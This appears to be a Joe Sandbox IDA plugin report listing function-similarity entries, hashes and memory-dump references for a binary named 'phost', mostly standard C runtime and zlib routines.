                                                                                                                                                                                                                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3140674995-0
                                                                                                                                                                                                                              • Opcode ID: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
                                                                                                                                                                                                                              • Instruction ID: 71f7a122e9ad5b139c7a8b68dfae2a2dceba75c274ea0a3382f9664722fbecd4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 84311A72708A819AEB608F64E8903FE7374FB84758F44443ADA4E87B99EF38D548C711
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF62CC95CB5
                                                                                                                                                                                                                                • Part of subcall function 00007FF62CC95608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF62CC9561C
                                                                                                                                                                                                                                • Part of subcall function 00007FF62CC8A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF62CC92D92,?,?,?,00007FF62CC92DCF,?,?,00000000,00007FF62CC93295,?,?,?,00007FF62CC931C7), ref: 00007FF62CC8A9CE
                                                                                                                                                                                                                                • Part of subcall function 00007FF62CC8A9B8: GetLastError.KERNEL32(?,?,?,00007FF62CC92D92,?,?,?,00007FF62CC92DCF,?,?,00000000,00007FF62CC93295,?,?,?,00007FF62CC931C7), ref: 00007FF62CC8A9D8
                                                                                                                                                                                                                                • Part of subcall function 00007FF62CC8A970: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF62CC8A94F,?,?,?,?,?,00007FF62CC8A83A), ref: 00007FF62CC8A979
                                                                                                                                                                                                                                • Part of subcall function 00007FF62CC8A970: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF62CC8A94F,?,?,?,?,?,00007FF62CC8A83A), ref: 00007FF62CC8A99E
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF62CC95CA4
                                                                                                                                                                                                                                • Part of subcall function 00007FF62CC95668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF62CC9567C
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF62CC95F1A
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF62CC95F2B
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF62CC95F3C
                                                                                                                                                                                                                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF62CC9617C), ref: 00007FF62CC95F63
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4070488512-0
                                                                                                                                                                                                                              • Opcode ID: 76424cc0ec02945f4fd2ccc640ea60475aa997d4131cc6c9dd67359800dfdabb
                                                                                                                                                                                                                              • Instruction ID: 9eda81bfe8b24ce5f2da52320179c538b1a0f439762d8ccea2f71c5f12eab25b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 76424cc0ec02945f4fd2ccc640ea60475aa997d4131cc6c9dd67359800dfdabb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7ED1C162F0865286EF20AF2ADC515B96771EF847A8F44C236EA0DC7696DF3CE4418742
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1239891234-0
                                                                                                                                                                                                                              • Opcode ID: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
                                                                                                                                                                                                                              • Instruction ID: cf4ca272f6a914803da853a19940e15fae5bc9d9ed0e1b6bf7f070c433a74314
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 98315132718F8196EB608F29EC506AE73B4FB84768F544135EA8D87B54DF3CC1458B01
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2227656907-0
                                                                                                                                                                                                                              • Opcode ID: 5fde642f47360a120b3bbdc49a752417dcdc94f7dd720a243365bab1f94d45be
                                                                                                                                                                                                                              • Instruction ID: 9fd4ae548ac1ef3df7c51d4114e7dfce83ccbd1a0ccab4bef7e6d245794e04f3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5fde642f47360a120b3bbdc49a752417dcdc94f7dd720a243365bab1f94d45be
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A1B1D662B1C69241EE619B2ADC015BA63B1EB45BF8F448131EE5D87BD5EF3CE441C302
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF62CC95F1A
                                                                                                                                                                                                                                • Part of subcall function 00007FF62CC95668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF62CC9567C
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF62CC95F2B
                                                                                                                                                                                                                                • Part of subcall function 00007FF62CC95608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF62CC9561C
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF62CC95F3C
                                                                                                                                                                                                                                • Part of subcall function 00007FF62CC95638: _invalid_parameter_noinfo.LIBCMT ref: 00007FF62CC9564C
                                                                                                                                                                                                                                • Part of subcall function 00007FF62CC8A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF62CC92D92,?,?,?,00007FF62CC92DCF,?,?,00000000,00007FF62CC93295,?,?,?,00007FF62CC931C7), ref: 00007FF62CC8A9CE
                                                                                                                                                                                                                                • Part of subcall function 00007FF62CC8A9B8: GetLastError.KERNEL32(?,?,?,00007FF62CC92D92,?,?,?,00007FF62CC92DCF,?,?,00000000,00007FF62CC93295,?,?,?,00007FF62CC931C7), ref: 00007FF62CC8A9D8
                                                                                                                                                                                                                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF62CC9617C), ref: 00007FF62CC95F63
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3458911817-0
                                                                                                                                                                                                                              • Opcode ID: 8084827ab6892e9bf44fc7ae7df730cc4e836e683a41a1d7f4ca7a201d78ec16
                                                                                                                                                                                                                              • Instruction ID: 487cc8da38f35d392e169b1bd9d713813a4fca92cb90ad373c67ccca4ad9a43b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8084827ab6892e9bf44fc7ae7df730cc4e836e683a41a1d7f4ca7a201d78ec16
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6351A272B0864296EB20EF29DC815B96770FF487A8F449235EA4DC7796DF3CE4418742
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2933794660-0
                                                                                                                                                                                                                              • Opcode ID: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
                                                                                                                                                                                                                              • Instruction ID: 30a86eb453e76a9721887be65965a5b17c55db779209dd1300800f92d1fe55ff
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7F113A32B14F058AEF008F65EC542B933B4FB59B68F040E35DA6D867A4DF38D1658342
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memcpy_s
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1502251526-0
                                                                                                                                                                                                                              • Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                                              • Instruction ID: 9884e701688017cce5f759390f4ae9081b35bddc6a916db2beede986e1fd9a04
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A3C1C072B1868687EB24CF19A44467AB7A1F794B98F449135DB4E83784DF3DE801CB40
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: $header crc mismatch$unknown header flags set
                                                                                                                                                                                                                              • API String ID: 0-1127688429
                                                                                                                                                                                                                              • Opcode ID: 41de47797cb66f1826093f4b1d60416fd99d26d25a53ce6bfd127eaa39bdfb5e
                                                                                                                                                                                                                              • Instruction ID: 9b7c91d07ba56573fa82d877dccee9dbdd5dab4abfcfb21b135deb64a53aecd9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 41de47797cb66f1826093f4b1d60416fd99d26d25a53ce6bfd127eaa39bdfb5e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 18F19172B582C58BEBA58F1D8C88B3A3ABDEF44760F055538DA498B390CF38D949D741
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionRaise_clrfp
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 15204871-0
                                                                                                                                                                                                                              • Opcode ID: 2f74b2cda317b12825bead48c90720a79ba1abfeed249303701d480a1679e454
                                                                                                                                                                                                                              • Instruction ID: 8f2ab1184367e3b344c4831637e4a9b847959ce708a5af8493890a8ff7b51690
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2f74b2cda317b12825bead48c90720a79ba1abfeed249303701d480a1679e454
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4FB11573A04B898AEB198F2DC8863687BB0F784B6CF19C925DA5D837A4CF39D451C701
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: $
                                                                                                                                                                                                                              • API String ID: 0-227171996
                                                                                                                                                                                                                              • Opcode ID: 3098a868bf4d382f942c0283459ab4806c0f53f7eb332f8174ba39f6fc7772a0
                                                                                                                                                                                                                              • Instruction ID: 5cbca36b0ded584e0db3335e8b02d8e2f90d423ae5fb83d6b445af7960f6a7ce
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3098a868bf4d382f942c0283459ab4806c0f53f7eb332f8174ba39f6fc7772a0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 76E19476B1864681EF6A8E2D885097A33B0FF45FE4F186335DA4E87694DF29E841C702
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: incorrect header check$invalid window size
                                                                                                                                                                                                                              • API String ID: 0-900081337
                                                                                                                                                                                                                              • Opcode ID: 5aba513b73eb8988df982bd12c0510577381bb82701c7147ce4cedc0b53fa8f7
                                                                                                                                                                                                                              • Instruction ID: 6286b607bcdfcaa834106af2a137d62efbb1132cf917ec4d7b21707be0d513e7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5aba513b73eb8988df982bd12c0510577381bb82701c7147ce4cedc0b53fa8f7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7C918772B182C647EBA48F19C858B3E3ABDFB44360F115139DA5A8A7C0CF38E544DB41
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: e+000$gfff
                                                                                                                                                                                                                              • API String ID: 0-3030954782
                                                                                                                                                                                                                              • Opcode ID: b62be3d0480bbbd0e022829aa0980c84d51f153df7fa61e27e52cad2b39beef0
                                                                                                                                                                                                                              • Instruction ID: b3636811c3238f80ab1bc0681b2c2c3effea66ec407daa00a5a7a538f5e922e2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b62be3d0480bbbd0e022829aa0980c84d51f153df7fa61e27e52cad2b39beef0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E2515866B182C186EB268E399C00B6A67A1E744BE4F48C735CB9CC7AC5CF3DE441C702
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1010374628-0
                                                                                                                                                                                                                              • Opcode ID: 2d471da97334de2acf0262392bad6ca7d41a72817533bf8b70dbf69db73f0db4
                                                                                                                                                                                                                              • Instruction ID: 12439d3948b566193bfb97e25fb1f96624917a200caaee01c36236ff8a297f8d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2d471da97334de2acf0262392bad6ca7d41a72817533bf8b70dbf69db73f0db4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2002DF22F2D65240FE66AB5D9C0527A26B0AF09BB8F45C634ED5DC63D2DE3CE4418382
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: gfffffff
                                                                                                                                                                                                                              • API String ID: 0-1523873471
                                                                                                                                                                                                                              • Opcode ID: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
                                                                                                                                                                                                                              • Instruction ID: 8ed0a325abbebc556dbaa8c3a34bb106706a3594526e4babc6a21b0a098ca09e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 87A12863B087C646EF22CF29A840BAA7BA1AF557E4F058232DE4D87785DE3DD501C712
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: TMP
                                                                                                                                                                                                                              • API String ID: 3215553584-3125297090
                                                                                                                                                                                                                              • Opcode ID: 5f14576829c2a404d65bc8e6713cc3c63392e5e443677cfdf71167dbae88db0a
                                                                                                                                                                                                                              • Instruction ID: 540ebdcd32bf9b8a673396298c049ceafd84849ff5e3691c38c679bb19afdf05
